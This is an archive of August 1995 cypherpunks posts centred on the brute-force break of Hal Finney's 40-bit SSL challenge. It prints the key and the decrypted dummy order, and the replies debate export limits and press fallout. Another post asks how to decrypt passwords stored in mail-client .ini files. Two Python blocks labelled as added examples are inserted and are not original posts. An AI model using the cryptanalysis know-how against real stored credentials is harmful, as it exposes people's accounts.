Personally, I'm more than willing to accept the tradeoff in order to have
the tight integration of the three capabilities (data, fax and phone). I
still have a funky NuBus card from SuperMac (with three RJ11 connectors
and an RS232 connector that was designed to combine these capabilities,
it was a prototype) sitting in a drawer while my Quadra and PowerMac are
smoothly providing the services. The next step will be to integrate
PGPFone with the other three functions so that one could handle data,
fax, phone, and secure phone all with the same phone line and without
requiring a rocket scientist to set up and use it.

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@maroon.tc.umn.edu
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: monty.harder@famend.com (MONTY HARDER)
Date: Wed, 16 Aug 95 17:39:25 PDT
To: CYPHERPUNKS@toad.com
Subject: Re: Object Oriented Crypto API
Message-ID: <8AF4269.000300032B.uuout@famend.com>
MIME-Version: 1.0
Content-Type: text/plain


RC> anything without having to know anything about those formats at all.

  Yes. We need to be able to drop in new algorithms, because nobody
knows what new attacks will be developed.

RC> a Universal Resource Name (URN) for key identification. Perhaps
RC> "key://keyserver.domain/keyid" would be better.

  Need to expand the concept of a key just a bit here. Your URL for keys
needs to map to a hierarchy of keys that apply to different facets of a
person's life, (casual vs. sensitive, personal vs. business) as well as
to different encryption engines. The pubkey I have in the keyserver for
the RSA algorithm will not work if you want to use the FOO algorithm
instead.

  Rather than replicating the entire structure of keys for each new
algorithm that comes along, there should be a standard protocol for
requesting these various key types from the same "place".



 * I can't find where to put the milk in my "cereal" port.
---
 * Monster@FAmend.Com *    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien.Doligez@inria.fr (Damien Doligez)
Date: Wed, 16 Aug 95 01:42:51 PDT
To: cypherpunks@toad.com
Subject: SSL challenge -- broken !
Message-ID: <9508160842.AA27120@couchey.inria.fr>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

SSL challenge -- broken

This is to announce the solution of the SSL challenge posted by Hal
Finney on July 17, 1995 (message-ID: <3u6kmg$pm4@jobe.shell.portal.com>),
also found at: <URL:http://www.portal.com/~hfinney/sslchal.html>

The 40-bit secret part of the key is 7e f0 96 1f a6.  I found it by a brute
force search on a network of about 120 workstations and a few parallel
computers at INRIA, Ecole Polytechnique, and ENS.  The key was found after
scanning a little more than half the key space in 8 days.

The cleartext of the encrypted data is as follows:

The SERVER-VERIFY message is:

9C B1 C7 83 D9 BB B7 75 01 6F 19 19 03 58 EC 05     MAC-DATA
05                                                  MSG-SERVER-VERIFY
AF 84 A7 79 F8 13 69 20 25 9B 53 A0 60 AE 75 51     CHALLENGE

The CHALLENGE part is a copy of the challenge sent by the client in its
first message.

The answer is the CLIENT-FINISHED message:

22 BB 23 39 55 B0 7F B6 1A B0 35 85 F7 DB C1 E5     MAC-DATA
03                                                  MSG-CLIENT-FINISHED
BF EB 90 F8 2C 0C E1 EA 18 AC 11 4C 83 14 21 B6     CONNECTION-ID

The next message is SERVER-FINISHED:

D4 CD F3 4E 38 F1 2B 1E DC FD 72 C8 34 02 CD FF     MAC-DATA
06                                                  SERVER-FINISHED-BYTE
23 1C 05 40 60 72 49 6E 83 BA D1 28 CC 9B 5F 63     SESSION-ID-DATA

Then comes the data message sent by the client.  This is the juicy one.
I have broken the contents into its fields (the body was just one long
line)

72 23 B5 98 0D D0 07 1A DA F1 C7 A4 40 41 5A 10     MAC-DATA
POST /order2.cgi HTTP/1.0
Referer: https://order.netscape.com/order2.cgi
User-Agent: Mozilla/1.1N (Macintosh; I; PPC)
Accept: */*
Accept: image/gif
Accept: image/x-xbitmap
Accept: image/jpeg
Content-type: application/x-www-form-urlencoded
Content-length: 472

source-form=order2-cust.html&
order_number=31770&
prod_80-01020-00_Mac=1&
carrier_code=UM&
ship_first=Cosmic&
ship_last=Kumquat&
ship_org=SSL+Trusters+Inc.&
ship_addr1=1234+Squeamish+Ossifrage+Road&
ship_addr2=&
ship_city=Anywhere&
ship_state=NY&
ship_zip=12345&
ship_country=USA&
ship_phone=&
ship_fax=&
ship_email=&
bill_first=&
bill_last=&
bill_org=&
bill_addr1=&
bill_addr2=&
bill_city=&
bill_state=&
bill_zip=&
bill_country=USA&
bill_phone=&
bill_fax=&
bill_email=&
submit=+Submit+Customer+Data+

This order came from Mr Cosmic Kumquat, SSL Trusters Inc.,
1234 Squeamish Ossifrage Road, Anywhere, NY 12345 (USA).

Unfortunately, Mr Kumquat forgot to give his phone number, and the
server's reply (in two packets) is:

09 12 AD FE A5 A9 BF D1 8C 8C E2 6A A3 48 B9 75    MAC-DATA
HTTP/1.0 200 OK
Server: Netscape-Commerce/1.1
Date: Wednesday, 12-Jul-95 05:40:30 GMT
Content-type: text/html

1C CD C4 3D 80 F1 7B 94 11 AC E8 72 B1 99 BC FA    MAC-DATA
<TITLE>Error</TITLE><H1>Error</H1>
The shipping address you supplied is not complete.  The street address,
city, state, zip code, country and phone number are mandatory fields.
Please go back and specify the full shipping address.  Thank you.


This result was found with a quick-and-dirty distributed search program,
which I wrote when I realized that the cypherpunks were going to be a few
weeks late with their collective effort.  When the program was running,
it took little more than one week to find the key (it would have taken about
15 days to sweep the entire key space).  I ran it on almost all the machines
I have access to, summarized in the following table:

type                  speed (keys/s)    number     notes
- --------------------------------------------------------
DEC (alpha)           18000-33000        34
DEC (MIPS)            2500-7500          11
SPARC                 2000-13000         57
HP (HPPA/snake)       15000              3
Sony (R3000)          1100-4000          3
Sun 3                 600                2
Sequent B8000         100 x 10           1         (1)
Multimax (NS532)      600 x 14           1         (1)
KSR                   3200 x 64          1         (1) (2)

Notes:
1.  These are multiprocessor machines
2.  The KSR spent only about 2 days on this computation.

The total average searching speed was about 850000 keys/s,
with a maximum of 1350000 keys/s (1150000 without the KSR).


Conclusions:

* Many people have access to the amount of computing power that I used.
  The exportable SSL protocol is supposed to be weak enough to be
  easily broken by governments, yet strong enough to resist the attempts
  of amateurs.  It fails on the second count.  Don't trust your credit
  card number to this protocol.

* Cypherpunks write code, all right, but they shouldn't forget to run it.


I want to thank the people at INRIA, Ecole Polytechnique, and Ecole
Normale Superieure for giving their CPU time.  (Most of them are on
vacation anyway...)


You can find a copy of this text at
<URL:http://pauillac.inria.fr/~doligez/ssl/announce.txt>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCSAwUBMDG4dVNZwSQVabihAQGeFAPnUZil4WlauoMke9HaULDNOVf1hLXS0i9U
VJWZsPHcihDbn6nBN9T6f3sW/S08N5YJFSCmuZzqO59c0nOAKILb6a3TsXjFEcu8
W8UfwFsZa6gx7iuYqandhoHBEkkc5NSwMe1f+lPiV2MdclzQ4/VtZ7Oa1VB+RftD
Am4+w/Y=
=Fju1
-----END PGP SIGNATURE-----

**** This is a timestamp of the above message:





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Wed, 16 Aug 95 10:46:13 PDT
To: cypherpunks@toad.com
Subject: Re:  SSL challenge -- broken !
Message-ID: <199508161745.KAA08481@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: Damien.Doligez@inria.fr (Damien Doligez)
> This is to announce the solution of the SSL challenge posted by Hal
> Finney on July 17, 1995 (message-ID: <3u6kmg$pm4@jobe.shell.portal.com>),
> also found at: <URL:http://www.portal.com/~hfinney/sslchal.html>

Although it is hardly necessary, I can confirm the accuracy of the
decryption found, and I extend my congratulations for this achievement!

Ironically, I understand that an independent effort coordinated by Adam
Back also discovered the key at approximately the same time.  In
addition, Eric Young had done a search starting at 8000000000 and
upwards; unfortunately the key value of 7ef0961fa6 was only about one
percent below his starting point.  Hopefully Adam will supply more
information.

It will be interesting to see what the fallout is from this
accomplishment.  It should provide ammunition for the current effort by
Microsoft and other companies to try to persuade the government to allow
the export of full 56 bit DES.

Knowing the tendency of the media and the net to oversimplify, this will
probably come out as "SSL is broken" just as the RSA-129 result led to
"RSA is broken" stories.  This would not be as egregious an
oversimplification as in the RSA case, but in fairness it should be
recognized that SSL as a spec provides support for much stronger ciphers
than the intentionally weakened RC4-40 which was broken here, but
Netscape was constrained by the government to supply browsers with only
the weak encryption.

I am a little alarmed by the suggestion that this news could have some
marked impact on the Netscape stock price.  From our perspective this was
certainly an unsurprising result (not to take anything away from Damien
and others who worked on it).  It is a useful reminder that the things we
work on here can have profound consequences.

Hal Finney
hfinney@shell.portal.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6

iQBVAwUBMDIuehnMLJtOy9MBAQHQbwH+I0YL1ewcCbXOGw8yYvKXIJMg15O0jmqW
wMb6SKrethbJzpWXJBpC1oKrl8wVzPvqBCLJtfJFWcN9xD4pTOluhA==
=0GPy
-----END PGP SIGNATURE-----
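
A cross-check of the figures quoted in the announcement and in the reply above, as an added example (it is not Damien Doligez's search program and performs no key search). It parses the machine table as posted and recomputes the sweep time, the share of the key space covered in 8 days, the KSR's contribution, and how far the key sat below Eric Young's starting point; the function names are assumptions, and the 56-bit figure extends the same arithmetic to the DES key size mentioned in the reply.

```python
import re

# Rows copied from the announcement: type, keys/s (range, or per-CPU x CPUs), machines.
TABLE = """\
DEC (alpha)           18000-33000        34
DEC (MIPS)            2500-7500          11
SPARC                 2000-13000         57
HP (HPPA/snake)       15000              3
Sony (R3000)          1100-4000          3
Sun 3                 600                2
Sequent B8000         100 x 10           1
Multimax (NS532)      600 x 14           1
KSR                   3200 x 64          1
"""

# Figures stated in the two messages.
AVG_RATE = 850_000            # keys/s, total average
PEAK_RATE = 1_350_000         # keys/s, maximum
PEAK_RATE_NO_KSR = 1_150_000  # keys/s, maximum without the KSR
FOUND_KEY = 0x7EF0961FA6      # the 40-bit secret part of the key
YOUNG_START = 0x8000000000    # where Eric Young's upward search began

ROW = re.compile(
    r"^(?P<name>.+?)\s{2,}(?P<lo>\d+)(?:-(?P<hi>\d+))?"
    r"(?:\s*x\s*(?P<cpus>\d+))?\s+(?P<count>\d+)\s*$"
)


def parse_table(text: str) -> list:
    """Turn each table row into a dict of name, lo/hi rate, CPUs, machine count."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if not m:
            continue
        lo = int(m["lo"])
        rows.append({
            "name": m["name"],
            "lo": lo,
            "hi": int(m["hi"] or lo),       # single figure: lo == hi
            "cpus": int(m["cpus"] or 1),    # "100 x 10" means 10 CPUs
            "count": int(m["count"]),
        })
    return rows


def aggregate_rate(rows: list, bound: str) -> int:
    """Sum keys/s over all machines, using the 'lo' or 'hi' end of each range."""
    return sum(r[bound] * r["cpus"] * r["count"] for r in rows)


def sweep_days(bits: int, rate: float) -> float:
    """Days needed to try every key of the given length at `rate` keys/s."""
    return 2 ** bits / rate / 86_400


def fraction_scanned(days: float, rate: float, bits: int = 40) -> float:
    """Share of the key space covered after `days` at `rate` keys/s."""
    return days * 86_400 * rate / 2 ** bits


def gap_below_start() -> float:
    """How far below Eric Young's starting point the key lay, relative to it."""
    return (YOUNG_START - FOUND_KEY) / YOUNG_START


if __name__ == "__main__":
    rows = parse_table(TABLE)
    ksr = next(r for r in rows if r["name"] == "KSR")
    print("machines listed:", sum(r["count"] for r in rows))
    print("table capacity keys/s:", aggregate_rate(rows, "lo"),
          "to", aggregate_rate(rows, "hi"))
    print("KSR keys/s:", ksr["lo"] * ksr["cpus"],
          "vs stated gap", PEAK_RATE - PEAK_RATE_NO_KSR)
    print("full 40-bit sweep, days: %.2f" % sweep_days(40, AVG_RATE))
    print("covered in 8 days: %.1f%%" % (100 * fraction_scanned(8, AVG_RATE)))
    print("key below Young's start: %.2f%%" % (100 * gap_below_start()))
    print("56-bit sweep at same rate, years: %.0f"
          % (sweep_days(56, AVG_RATE) / 365.25))
```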




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Wed, 16 Aug 95 11:07:10 PDT
To: cypherpunks@toad.com
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161745.KAA08481@jobe.shell.portal.com>
Message-ID: <199508161806.LAA29214@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Hal <hfinney@shell.portal.com> writes:
> I am a little alarmed by the suggestion that this news could have some
> marked impact on the Netscape stock price.  From our perspective this was
> certainly an unsurprising result (not to take anything away from Damien

So far it appears not to have had an effect.  The two web pages I know about
that track Netscape show it holding steady a point and a half above where it
opened.  Even the IF market on SSLW doesn't seem to be taking much notice of
it, despite my attempts at manipulating that market.

	Jim Gillogly
	Mersday, 24 Wedmath S.R. 1995, 18:06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Sean A. Walberg" <sean@escape.ca>
Date: Wed, 16 Aug 95 09:14:48 PDT
To: cypherpunks@toad.com
Subject: Eudora/Trumpet encryption
Message-ID: <Pine.SOL.3.91.950816110927.4127G-100000@wpg-01.escape.ca>
MIME-Version: 1.0
Content-Type: text/plain


I'm a crypto newbie here, but does anybody know how Trumpet Winsock 
and/or Eudora encrypt the passwords in their .ini files?  I am trying to 
write a front end for a client and would rather it set up automatically 
rather than the program ask.

How would I go about cryptanalysing this?  If it were a simple XOR, then 
wouldn't Plaintext1^Cypher1 == Plaintext2^Cypher2 and so on?

Thanx for any help you can give me on this matter,

Sean

o-------------------o----------------------o-----------------------o
|   Sean Walberg,   |    Tech Support      | Pas_al, _obol, BASI_, |
|  sean@escape.ca   | escape communication |   PostS_ript, T_L...  |
| Mail for PGP key  |      925-4290        | C fills all the holes |
o----------------] http://www.escape.ca/~sean [--------------------o





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lance Cottrell <loki@obscura.com>
Date: Wed, 16 Aug 95 11:24:39 PDT
To: Jim Gillogly <jim@acm.org>
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161806.LAA29214@mycroft.rand.org>
Message-ID: <Pine.3.89.9508161127.A13461-0100000@obscura.com>
MIME-Version: 1.0
Content-Type: text/plain


Even more to the point is my claim on IF about brute forcing
a 40 bit cipher "Cr40".

	-Lance

On Wed, 16 Aug 1995, Jim Gillogly wrote:

> 
> > Hal <hfinney@shell.portal.com> writes:
> > I am a little alarmed by the suggestion that this news could have some
> > marked impact on the Netscape stock price.  From our perspective this was
> > certainly an unsurprising result (not to take anything away from Damien
> 
> So far it appears not to have had an effect.  The two web pages I know about
> that track Netscape show it holding steady a point and a half above where it
> opened.  Even the IF market on SSLW doesn't seem to be taking much notice of
> it, despite my attempts at manipulating that market.
> 
> 	Jim Gillogly
> 	Mersday, 24 Wedmath S.R. 1995, 18:06
> 

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Aug 95 08:26:45 PDT
To: cypherpunks@toad.com
Subject: BUY_lou
Message-ID: <199508161526.LAA06595@pipe3.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-16-95. NYPaper:


   "The F.B.I. and Ruby Ridge." [Editorial]

      Since the paranoid days of J. Edgar Hoover, the F.B.I.
      has been struggling to free itself of an institutional
      incapacity to admit its mistakes and punish wrongdoing
      by senior officials. Mr. Freeh, who was entrusted with
      this task, seems to have put misplaced confidence in a
      longtime friend and associate. Mr. Freeh is said to be
      infuriated that his trust was abused. Well he should be
      furious -- especially at himself.


   "Separatist Family Given $3.1 Million From Government."

      The Government agreed today to pay $3.1 million to the
      family of a white separatist whose wife and teen-age son
      were killed three years ago by Federal agents in a
      standoff on a remote Idaho mountainside. The decision to
      give Mr. Weaver and his children any money was
      particularly stunning, since Federal prosecutors tried
      two years ago to have him convicted in the killing of a
      Federal marshal at Ruby Ridge, and sought the death
      penalty. Federal investigators involved in the case were
      rebuked by the judge who presided over the trial. The
      case has also taken on political dimensions. Some
      conservative groups have cited the shootout, along with
      the 1993 F.B.I. assault on the Branch Davidian compound
      near Waco, Tex., as examples of Government abuse of
      power.


   BUY_lou











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Patterson <lep@tanju.wsnet.com>
Date: Wed, 16 Aug 95 09:30:14 PDT
To: cypherpunks@toad.com
Subject: DSP's, Purple Boxes, Etc...
Message-ID: <Pine.LNX.3.91.950816112614.14429A-100000@tanju.wsnet.com>
MIME-Version: 1.0
Content-Type: text/plain



For those interested in design of these purple boxes, etc., you might 
want to check out a couple of magazines that are FULL of advertisements 
and specs on DSP's, CPU's, communications design equipment, etc:

Data Communications
(800) 525-5003

and

Computer Design
Circulation Director (918) 832-9287 email paulw@pennwell.com

Both magazines are free.

Alan Patterson (lep@wsnet.com)       PGP public key available at MIT keyserver.
WSNetwork Communications Services, Inc. Fngpt: 41D0F61B496FECC09FABECF686AB2AIC
Montgomery, Alabama (334) 263-5505 (800) INET-750 PGP Encrypted Email Preferred





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jason Weisberger <jweis@primenet.com>
Date: Wed, 16 Aug 95 11:32:41 PDT
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
In-Reply-To: <199508161654.MAA25878@access5.digex.net>
Message-ID: <199508161832.LAA28361@usr5.primenet.com>
MIME-Version: 1.0
Content-Type: text


> 
> I don't think that there is any serious worry for Netscape. Their
> security is fine-- it's just crippled by the US Government. They
> could probably start distributing binary versions of their software
> that used full 128 bit keys in several hours. It's just that the
> Government gets pissed off about these things.
> 

I have to agree, Netscape may spend some energy to upgrade their 
encryption, but it really won't buy them all that much.   SSL, to me, is 
like using a "security envelope" to mail cash or putting the club on your 
car.  It presents just enough of an obstacle to keep honest people honest.

jweis@primenet.com
http://www.qtime.com/~jweis



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Josh M. Osborne" <stripes@va.pubnix.com>
Date: Wed, 16 Aug 95 08:44:51 PDT
To: John Young <jya@pipeline.com>
Subject: Re: BUY_lou
In-Reply-To: <199508161526.LAA06595@pipe3.nyc.pipeline.com>
Message-ID: <LAA06255.199508161544@garotte.va.pubnix.com>
MIME-Version: 1.0
Content-Type: text/plain



Hit me please.

  :-)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Blossom <eb@comsec.com>
Date: Wed, 16 Aug 95 12:58:03 PDT
To: die@die.com
Subject: Purple Boxes
In-Reply-To: <9508160230.AA01456@pig.die.com>
Message-ID: <199508161935.MAA23741@comsec.com>
MIME-Version: 1.0
Content-Type: text/plain


>	I reiterate my suggestion of a few months ago that
> one could quite easily adapt the firmware on one of the new simultaneous
> data and digital voice on the same phone line modems to incorporate
> encryption, and quite possibly encryption/key exchange interoperable
> with some mode of PGPphone. 

I've looked at the AT&T simultaneous voice and data stuff (VoiceSpan),
and from what I can determine from reading between the lines, the
voice stuff is not really digitized (a la PCM), rather it is just
pushed around somewhere else in the spectrum.  The data is apparently
modulated using a variant on QAM, and the data rate varies dynamically
depending on whether or not you are saying anything.

As I recall the block diagram is ...

				+-----------+	    +--------+
             analog voice <---> |           |  	    | 	     |<--- TIP
			        | Modem IC  |<----> |  DAA   |
	digital bitstream <--->	|           |	    |        |<--- RING
				+-----------+	    +--------+


You can get data sheets from AT&T Microelectronics.

Eric




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 16 Aug 95 09:41:14 PDT
To: www-buyinfo@allegra.att.com
Subject: Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <v02120d01ac57cb36e14b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>-----BEGIN PGP SIGNED MESSAGE-----
>
>SSL challenge -- broken

Indeed, it seems so, and the feeding frenzy in the press has begun.

I zinged this over from cypherpunks to www-buyinfo this morning, and this
afternoon I got a rather interesting call from a reporter.  I told him
about ITARs, its effect on internet commerce and the silliness of a 40 bit
key, etc.

He wanted to know if I knew Damien's phone number(!), and I told him to
have ATT put one of their translators-for-hire on the line and call INRIA,
Ecole Polytechnique, or Ecole Normale Superieure, and track him down there.

Meanwhile, if Mr. Doligez sees this, call Alan Beck at 619-625-0700, or
email him at alan@tgc.com.

I can see the headlines now: "Netscape Security Broken, Stock Falls".

Make-a the Ganglia Twitch. Haven't had this much fun since the hogs ate my
little brother...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Peter Wayner <pcw@access.digex.net>
Date: Wed, 16 Aug 95 09:55:27 PDT
To: www-buyinfo@allegra.att.com
Subject: Re:  Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <199508161654.MAA25878@access5.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


I don't think that there is any serious worry for Netscape. Their
security is fine-- it's just crippled by the US Government. They
could probably start distributing binary versions of their software
that used full 128 bit keys in several hours. It's just that the
Government gets pissed off about these things.

In general, it just adds more flames to the fire started by the 
letter written by Microsoft, IBM and Lotus. Their point is bolstered
by this easy attack. 

-Peter




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Wed, 16 Aug 95 04:08:14 PDT
To: gt7508b@prism.gatech.edu
Subject: Re: Purple Boxes
Message-ID: <9508161105.AA21087@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> Has anyone ever tried putting PGP on a chip??? RSA??? (Are these too
> slow for realistic real time hardware voice/data encryption??)

We have implemented a public-key system in smartcards. The secret
key is completely generated and hidden inside the card. The public
key system is TESS (RFC1824). An authenticated key exchange is
performed by the card in about one second.

Hadmut




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dave Emery" <die@pig.die.com>
Date: Wed, 16 Aug 95 10:39:46 PDT
To: stewarts@ix.netcom.com (Bill Stewart)
Subject: Re: Purple Boxes
In-Reply-To: <199508160843.BAA25109@ix9.ix.netcom.com>
Message-ID: <9508161739.AA02917@pig.die.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 10:30 PM 8/15/95 -0400, Dave Emery wrote:
> >	I reiterate my suggestion of a few months ago that
> >one could quite easily adapt the firmware on one of the new simultaneous
> >data and digital voice on the same phone line modems to incorporate
> >encryption, and quite possibly encryption/key exchange interoperable
> >with some mode of PGPphone.

> Most modems I've seen only have one set of audio interfaces,
> and a bump-in-the-cord phone needs two (one for the voice side,
> one for the modem line side.)  (Having two jacks doesn't count.)
> So you'd need at least two modems, one straight and one re-educated,
> and you'd probably need lots more flash ROM than the average modem has.

	The kind of modem I was referring to is designed to supply a
digital voice connection interleaved with 28.8 kb V.34 high speed data
over a common modem connection.  As such it has an extra audio A/D and
D/A and line interface; in fact some of these modems actually have a
full telco CO type phone line interface so one can plug in a regular
vanilla phone and talk full duplex over the digital path just as on an
analog phone line.  They are already truly bump-in-the-cord devices. 

	These modems are a new product, just being introduced, and are
apparently aimed at the service desk/tech support market where they
supply the capability for someone diagnosing a problem to have the
customer's screen display on their system and access their keyboard
while talking to the customer about what is wrong.   (As a historical
note, I was involved in the development of this technology at
Data General in the late 70's using fdm data over voice analog signalling
- the reason it didn't catch on was that the modem connection was
very slow (300 baud)).

	There is an effort in the modem industry to standardize the
voice compression used and the protocol so such modems will interoperate
with those made by other manufacturers  - I don't think anybody has
addressed encryption in this protocol (after all, the NSA has kept
encryption out of the data side of modems where it would be trivial
to implement).

	As for the ROM size issue - I'm sure if one was expecting to
be able to drop in PGPphone code relatively unmodified it would
be a problem, but actually implementing the core encryption and crypto sync
stuff would only be a few tens of kb of code at most in a ROM that
may well be 512 kb or more now with significant space reserved for
expansion and bug fixes and support of older modem protocols.

							Dave Emery
							die@die.com

 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steven Champeon - Imonics Development <schampeo@imonics.com>
Date: Wed, 16 Aug 95 11:05:41 PDT
To: pcw@access.digex.net
Subject: Re:  Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
Message-ID: <9508161804.AA26353@fugazi.imonics.com>
MIME-Version: 1.0
Content-Type: text/plain


|   Subject: Re:  Phone call for Mr. Doligez, was Re: SSL challenge -- broken !
|   From: Peter Wayner <pcw@access.digex.net>
|   
|   I don't think that there is any serious worry for Netscape. Their
|   security is fine-- it's just crippled by the US Government. They
|   could probably start distributing binary versions of their software
|   that used full 128 bit keys in several hours. It's just that the
|   Government gets pissed off about these things.

The netscape client already has these capabilities built in. During the
negotiation stage, the client talks to the server, which announces which
strength to use. For exported versions of both the client and the server
they are limited to 40 bit RC4. For US versions, all available strengths
are supported with an option to enable them.

Pull up Netscape, and for the URL type: "about:". It will tell you which
algorithms are used, but not their key bit length. 

When you configure their Commerce server, you have the option to enable
any of the supported bit lengths and algorithms, including RC2 and RC4,
IDEA, 40 -> 128 bits, 64 -> 192 for DES.

Netscape's server, since it must service foreign requests, probably doesn't
even waste its time asking for >40 bit, since that would add to the time
it takes to negotiate a common scheme.

If anyone has any insight into this, please fill me in. I just wanted to
clarify a few things.

Steve

--
Steve Champeon
Technical Lead, Imonics Web Services
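
The negotiation described in the message above, reduced to a simplified model. This is an added example, not part of the original post and not Netscape's code or the SSL wire protocol; the suite lists, the server preference order and the `floor` parameter are assumptions, with cipher names and nominal key lengths taken from the message.

```python
# Added example: a simplified model of cipher negotiation, not the SSL wire
# protocol. Suite lists, preference order and `floor` are assumptions.
from typing import Dict, NamedTuple, Optional, Sequence


class Suite(NamedTuple):
    cipher: str
    bits: int  # nominal key length as quoted in the message above


# Server lists are in the server's order of preference (assumed).
US_SERVER = [
    Suite("RC4", 128), Suite("IDEA", 128), Suite("DES", 192),
    Suite("RC2", 128), Suite("DES", 64), Suite("RC4", 40), Suite("RC2", 40),
]
EXPORT_SERVER = [Suite("RC4", 40)]

US_CLIENT = list(US_SERVER)        # "all available strengths are supported"
EXPORT_CLIENT = [Suite("RC4", 40)]  # "limited to 40 bit RC4"


def negotiate(client: Sequence[Suite], server: Sequence[Suite],
              floor: int = 0) -> Optional[Suite]:
    """Return the first suite in the server's preference order that the
    client also supports and that meets the server's minimum key length.
    None means the server refuses the session."""
    offered = set(client)
    for suite in server:
        if suite in offered and suite.bits >= floor:
            return suite
    return None


def audit(server: Sequence[Suite], clients: Dict[str, Sequence[Suite]],
          floor: int = 0) -> Dict[str, Optional[Suite]]:
    """Negotiated suite per client build, for one server policy."""
    return {name: negotiate(suites, server, floor)
            for name, suites in clients.items()}


CLIENTS = {"US build": US_CLIENT, "export build": EXPORT_CLIENT}

if __name__ == "__main__":
    for floor in (0, 128):
        print(f"US server, floor={floor}:")
        for name, suite in audit(US_SERVER, CLIENTS, floor).items():
            print(f"  {name:13s} -> {suite}")
    print("export server:", audit(EXPORT_SERVER, CLIENTS))
```

The session strength is capped by the weaker side's list, so a server that keeps 40-bit suites enabled will run at 40 bits for any client that offers nothing else unless it enforces a floor.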





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 16 Aug 95 11:33:43 PDT
To: jim@acm.org
Subject: Re: SSL challenge -- broken !
In-Reply-To: <199508161806.LAA29214@mycroft.rand.org>
Message-ID: <199508161832.OAA19556@frankenstein.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly writes:
> > Hal <hfinney@shell.portal.com> writes:
> > I am a little alarmed by the suggestion that this news could have some
> > marked impact on the Netscape stock price.  From our perspective this was
> > certainly an unsurprising result (not to take anything away from Damien
> 
> So far it appears not to have had an effect.  The two web pages I know about
> that track Netscape show it holding steady a point and a half above where it
> opened.  Even the IF market on SSLW doesn't seem to be taking much notice of
> it, despite my attempts at manipulating that market.

I haven't seen any news stories about this on the wire
services. Someone would have to write a story about it first before
people would know...

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 16 Aug 95 11:46:00 PDT
To: Hal <cypherpunks@toad.com
Subject: Re:  SSL challenge -- broken !
Message-ID: <v02120d03ac57ebddeb94@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:45 PM 8/16/95, Hal wrote:
>I am a little alarmed by the suggestion that this news could have some
>marked impact on the Netscape stock price.


My apologies for causing alarm. I was merely making a too-subtle joke about
hysteria in the press and the capital markets for Netscape, and its
inevitable backlash.

Madness of crowds and all that...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: doug@openmind.com (Doug Cutrell)
Date: Wed, 16 Aug 95 14:57:38 PDT
To: cypherpunks@toad.com
Subject: Question:  DSA status and export requirements?
Message-ID: <v02120d0bac581ace1ca9@[204.214.106.202]>
MIME-Version: 1.0
Content-Type: text/plain


